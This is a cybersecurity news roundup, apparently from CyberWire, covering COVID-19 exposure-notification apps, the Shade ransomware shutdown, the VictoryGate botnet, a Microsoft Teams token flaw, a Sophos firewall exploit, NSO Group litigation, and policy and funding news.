Private companies offer COVID-19-tracking tools to governments.
Apple and Google have released a developer-focused version of their COVID-19 contact-tracing API, TechCrunch reports. Those who currently have access to the API are app developers working for public health authorities around the world, and the two companies plan to release a public version in mid-May.
The system will be opt-in and decentralized, although some observers doubt it will achieve a high enough level of participation to make a difference in slowing the spread of the virus. The Washington Post reports that nearly three in five Americans say they wouldn’t use the system being rolled out by Apple and Google. One in six Americans don’t own a smartphone, and fifty percent of those who do say they would decline to use such an app, largely due to privacy concerns and mistrust of Big Tech. TechCrunch observes that Apple and Google have shifted their terminology to better describe the system’s functionality, and now call the framework an “exposure notification” system as opposed to a “contact tracing” tool.
Meanwhile, Threatpost reports that the Electronic Frontier Foundation (EFF) has expressed concerns that Apple and Google’s exposure notification system suffers from potential flaws and vulnerabilities. The EFF warns that there’s no reliable way of ensuring that the devices sending proximity warnings are in fact the devices they’re supposed to be, and that trolling can’t be ruled out. The EFF uses the example of “a network of Bluetooth beacons set up on busy street corners that rebroadcast all the RPIDs they observe.” The organization also questions the effectiveness of the system, noting that Bluetooth wasn’t designed to detect if “two humans are experiencing an epidemiologically relevant contact,” and the technology might not be able to distinguish between two people kissing and two people sitting in traffic with their car windows rolled up.
Reuters reports that at least eight surveillance and spyware companies are marketing their tools to governments for contact-tracking and quarantine enforcement. Four of these companies said they’re rolling out their products in “more than a dozen countries in Latin America, Europe and Asia,” and Israel is seeking the help of NSO Group. These tools use various location tracking methods, but they come with the same concerns about precision as Apple and Google’s Bluetooth-based system. Government-deployed surveillance tools could obviously see a much higher level of participation than an opt-in system, but such tools come with clear privacy downsides and greater potential for long-term misuse.
Read more in the CyberWire Pro Privacy Briefing.
Shade ransomware closes shop.
The operators of the Shade ransomware, also known as Troldesh, announced on GitHub that they’re shuttering their operations, ZDNet reports. They’ve also released 750,000 decryption keys and encouraged antivirus firms to develop user-friendly decryption tools. The group apologized to its victims and expressed hope that they can recover their data. Kaspersky confirmed that the keys are legitimate and has since released a free decryptor.
Shade was among the oldest and most active strains of ransomware, operating from at least 2014 until the end of 2019. It’s not clear why they’ve had an apparent change of heart. BleepingComputer observes that Shade was unusual as far as ransomware strains go, in that it didn’t avoid targeting Russia and other post-Soviet states, and was actually most active in Russia and Ukraine.
Microsoft’s view of ransomware trends.
Microsoft released a report examining ransomware operations, lending further support to the argument that all ransomware attacks should be viewed as data breaches. Microsoft warns that, while a few ransomware groups are now well-known for exfiltrating data before encrypting it in place, “almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.” Redmond also found that in targeted ransomware operations, attackers “deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt.”
The company also notes that many of these actors are still targeting hospitals and other medical organizations, particularly NetWalker and the group behind the Vatet loader. Vatet is a custom loader for Cobalt Strike, which the group has recently been using to deploy “in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families.”
Disinformation-as-a-service on the rise.
BuzzFeed reports on the increasing demand for so-called “black PR” firms that are willing to use “fake accounts, false narratives, and pseudo news websites” to push their clients’ agendas. BuzzFeed found that, of the twenty-seven disinformation campaigns that have been at least partially attributed to PR firms since 2011, nineteen took place in 2019.
Jonathan Corpus Ong from the University of Massachusetts Amherst told BuzzFeed that in the Philippines these services have grown so widespread and effective that honest PR firms are struggling to compete. Ong stated that “[t]he Philippines offers a cautionary tale for other countries for what happens when disinformation production within the PR industry has become so financially lucrative that they have moved from shady black market transactions to the professional respectability of the corporate boardroom.”
Check out the CyberWire Pro Disinformation Briefing for more.
Large cryptomining botnet hobbled.
ESET discovered and disrupted a botnet that’s been active since at least May 2019 and had infected more than 35,000 devices, more than 90% of which were located in Peru. The botnet, which ESET calls “VictoryGate,” was primarily used for cryptomining, although the researchers note that the operator could have issued and executed new malware payloads at will. The cryptomining itself was taxing and disruptive, causing consistent CPU usage of between 90-99%. ESET estimates based on their visibility that the botnet has generated at least $6,000 worth of Monero. The botnet malware was distributed via infected USB drives, which ESET notes is a common mode of malware distribution in Latin America.
All of the botnet’s command-and-control domains were registered with the dynamic DNS provider No-IP, and No-IP promptly shut them down after being notified by ESET. This will block new victims from downloading additional payloads over the internet, but it won’t stop previously infected machines from mining Monero.
See more in the CyberWire Pro Research Briefing.
Microsoft Teams flaw could have led to widespread account takeover.
Microsoft fixed a vulnerability in its Teams communication and collaboration platform that could have allowed an attacker to use a GIF to gain access to an organization’s entire set of Teams accounts. Researchers at CyberArk found and disclosed the flaw, which stemmed from the way Teams used access tokens to allow users to view images that have been shared with them. These tokens were sent to teams.microsoft.com and any of its subdomains, and the researchers found two subdomains that were vulnerable to takeover. If an attacker could trick a user into accessing a resource on a compromised subdomain, they could intercept the user’s access token and subsequently access their Teams account data. The user wouldn’t have to visit the compromised subdomain to give up their token—they’d simply have to load an image that was hosted on it.
As a result, an attacker could send a message containing an image a Teams user and gain access to the victim’s account as soon as they viewed the image. The attacker could then use that account as a launching pad to send the image to other accounts within the organization, gaining access to every account whose owner viewed the image. In addition to data theft or destruction, CyberArk also notes the possibility of social engineering attacks launched by an attacker with control over every employee’s account.
CyberArk reported the vulnerability to Microsoft on March 23rd. Microsoft promptly deleted the DNS records of the two subdomains, then issued a patch on April 20th.
Sophos released an emergency patch for an actively exploited vulnerability in its XG enterprise firewall, ZDNet reports. Sophos explained that the “attack used a previously unknown pre-auth SQL injection vulnerability to gain access to exposed XG devices. It was designed to exfiltrate XG Firewall-resident data….The data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts. For example, this includes local device admins, user portal accounts, and accounts used for remote access.” Users will be notified via the XG management interface whether or not their devices were compromised.
Crime and punishment.
The US Federal Bureau of Investigation says that reported cases of cybercrime have risen dramatically during the pandemic. How dramatically? The FBI’s Internet Crime Complaint Center (IC3) normally receives about a thousand complaints a day. The IC3 is now logging, CyberArk observes, two to three times that number.
Courts and torts.
In new court filings, WhatsApp has accused NSO Group of being “deeply involved” in hacking 1,400 WhatsApp users, including journalists and activists, the Guardian reports. A WhatsApp engineer testified that in 720 of the cases, the spyware contained the IP address of a server belonging to QuadraNet, a company whose data centers were used by NSO. WhatsApp further claimed in its filing that “NSO used a network of computers to monitor and update Pegasus after it was implanted on users’ devices. These NSO-controlled computers served as the nerve centre through which NSO controlled its customers’ operation and use of Pegasus.”
NSO has maintained that it only sells its products to governments and that it doesn’t have any visibility into who those governments are targeting. The company disputed WhatsApp’s accusation, according to CyberScoop, asserting that NSO itself hadn’t contracted with QuadraNet and that “[i]f Pegasus messages did pass through QuadraNet servers, they would have been sent by NSO’s customers, not NSO.”
Bloomberg Law reports that mobile security software company MobileIron is suing BlackBerry for allegedly infringing on MobileIron’s patents while doling out “extortionate” royalty demands and infringement accusations against MobileIron and other companies. Cantech Letter observes that about a third of BlackBerry’s revenue comes from licensing fees, either paid willingly or as a result of litigation.
TechCrunch says LabCorp is being sued by one of its shareholders for allegedly covering up two data breaches, one discovered in May 2019 and the other reported by TechCrunch in January 2020. The lawsuit states that, “[a]mongst other reasons, demand is futile because the Board consciously disregarded its duties to provide timely notice of the Data Breaches to affected individuals, knowingly failed to make adequate public disclosures of the Data Breaches, willfully and intentionally disregarded the Company’s obligations to increase and/or establish more effective cybersecurity policies and procedures, and sought to disclaim all liability and responsibility for LabCorp patient data by, in effect, levying all accountability and remedial actions upon AMCA for the First Breach and then outright ignoring the ramifications of the Second Breach.” A LabCorp spokesperson told TechCrunch the lawsuit “will be vigorously defended.”
Policies, procurements, and agency equities.
President Trump this Friday issued an Executive Order on Securing the United States Bulk-Power System. The Executive Order expresses recognition of the degree to which foreign adversaries are interested in holding the US electrical power generation and distribution system at risk. It explicitly addresses cyber threats and vulnerabilities, but the Executive Order is also striking with respect to its concentration on safety and reliability engineering, and on the risk that a hostile foreign government could compromise hardware supply chains or engage in active sabotage.
The FCC last Friday issued Orders to Show Cause against China Unicom Americas, China Telecom Americas, ComNet, and Pacific Networks—four companies the FCC says “are ultimately subject to the ownership and control of the Chinese government.” The Orders give the companies thirty days “to explain why the Commission should not start the process of revoking their domestic and international section authorizations enabling them to operate in the United States.”
Members of Congress have asked for an explanation of the Defense Department’s plans, under consideration, to close the National Defense University’s College of Information and Cyberspace (CIC), Politico reports. Senators Mike Rounds (Republican of South Dakota) and Joe Manchin (Democrat of West Virginia) and Representatives Jim Langevin (Democrat of Rhode Island) and Elise Stefanik (Republican of New York) stated in a letter, “We believe that academic programs specializing in cyber and information warfare should not be relegated to standalone elective courses within other NDU colleges, in lieu of their full degree or certificate-granting status at the CIC.” They also noted that “any action to eliminate, subsume into another college, or institutionally diminish the CIC would require a change in law or prior explicit congressional approval.”
See the CyberWire Pro Policy Briefing for more.
Fortunes of commerce.
ICANN, the Internet Corp for Assigned Names and Numbers, has rejected a $1.1 billion deal to sell the Public Interest Registry (PIR)—the not-for-profit organization that controls the “.org” generic top-level domain—to Ethos Capital, a for-profit investment firm. The proposed deal had been criticized by California’s Attorney General, the Executive Director of the Electronic Frontier Foundation, and several founding members of ICANN, according to Reuters. The Verge explains that opponents of the deal worried that it would destabilize the domain’s operation, and they pointed to ethical questions about a for-profit firm managing a domain widely intended for use by non-profit organizations. ICANN’s Board stated that it “finds that the public interest is better served in withholding consent as a result of various factors that create unacceptable uncertainty over the future of the third largest gTLD registry.” Ethos contends that ICANN’s decision “sets a dangerous precedent with broad industry implications,” asserting that the organization “has overstepped its purview, which is limited to ensuring routine transfers of indirect control (such as the sale of PIR) do not impact the registry’s security, stability and reliability.”
FireEye announced on Wednesday that it plans to lay off around 6% of its workforce (approximately 204 employees), which will save the company $25 million in operating costs. Channel Partners notes that the restructuring was “planned long before the COVID-19 pandemic.”
Mergers and acquisitions.
Investments and exits.
Tel Aviv-based passwordless authentication provider Secret Double Octopus has secured $15 million in Series B funding from new investors Sony Financial Ventures, KDDI, and Global Brain, as well as existing investors Jerusalem Venture Partners, Benhamou Global Ventures (BGV), Liberty Media, Iris Capital, and Yaniv Tal.
Texas-based physical threat detection platform provider Ontic has raised $12 million in a Series A round led by Felicis Ventures, with participation from existing investors Silverton Partners, Floodgate, and Village Global.
New York-based healthcare data sharing company Particle Health has raised $12 million in a Series A round led by Menlo Ventures, with participation from existing investors Collaborative Fund, Story Ventures, and Company Ventures, Crunchbase News reports.
More business news can be found in the CyberWire Pro Business Briefing.